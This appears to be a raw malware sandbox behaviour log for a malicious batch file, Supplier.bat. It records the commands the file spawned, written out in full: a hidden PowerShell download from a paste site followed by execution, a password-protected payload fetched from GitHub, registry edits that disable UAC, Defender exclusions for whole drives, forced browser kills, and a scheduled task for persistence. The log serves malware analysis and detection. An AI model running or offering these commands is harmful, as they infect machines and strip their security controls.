Source: Yara match	File source: 42.0.DOCX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX1FC6.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Downloads\DOCX.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Supplier.bat" "

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iexplore.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "safari.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_DOCX.exe'
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epic.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "tor.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CMD.exe")

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: Supplier.bat

Virustotal: Detection: 9%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Supplier.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\Supplier.bat'))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 15
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1952,i,12353421626427265679,11746865726713041446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOCX.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 15
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe "C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Process created: C:\Users\user\Desktop\._cache_DOCX.exe "C:\Users\user\Desktop\._cache_DOCX.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe "C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe"
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 2628
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\Supplier.bat'))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 15	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOCX.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 15	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe "C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exe	Jump to behavior
